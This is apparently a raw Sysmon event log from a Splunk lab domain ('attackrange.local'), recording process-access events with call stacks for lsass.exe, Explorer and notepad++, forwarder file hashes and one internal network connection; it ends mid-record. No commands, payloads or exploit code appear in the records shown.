10341000x80000000000000001049230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.948{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:17.948{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.932{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.932{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:17.932{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.932{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.932{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.932{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.879{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.879{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.879{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.879{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.879{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.879{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.879{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:17.848{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:17.848{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:17.611{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1E7DA95F3DD308CF4F59AC89A7BD32D,SHA256=CD0EE5A54CFE2EA15CFBF1D814AC4021EADFC9EDD0AB933C3B10BB0C3F7DF519,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.951{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D6A8596644251D852CF14C08D32EE44,SHA256=0F7AAFF03CE7FFB808DC06BA4287590DAEF48BA6EC81D1031469D1BFCE0673D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.751{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.751{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.751{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.751{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.751{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.614{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=334C2F414B5E9DD51BCC55D5A61D51B6,SHA256=27B5797C3A52508407DB43EF8769071DF26FF0DDAFB764EBCC3C7197473B1712,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807712Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:16.573{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57277-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000807711Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:18.194{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69913F29EEF384D0688F7722FC32FB90,SHA256=EF9439C140D4F6B891B68550AB721C37FC2E04C5C005F54B2567F36E042A983A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.495{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.495{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.448{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.429{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 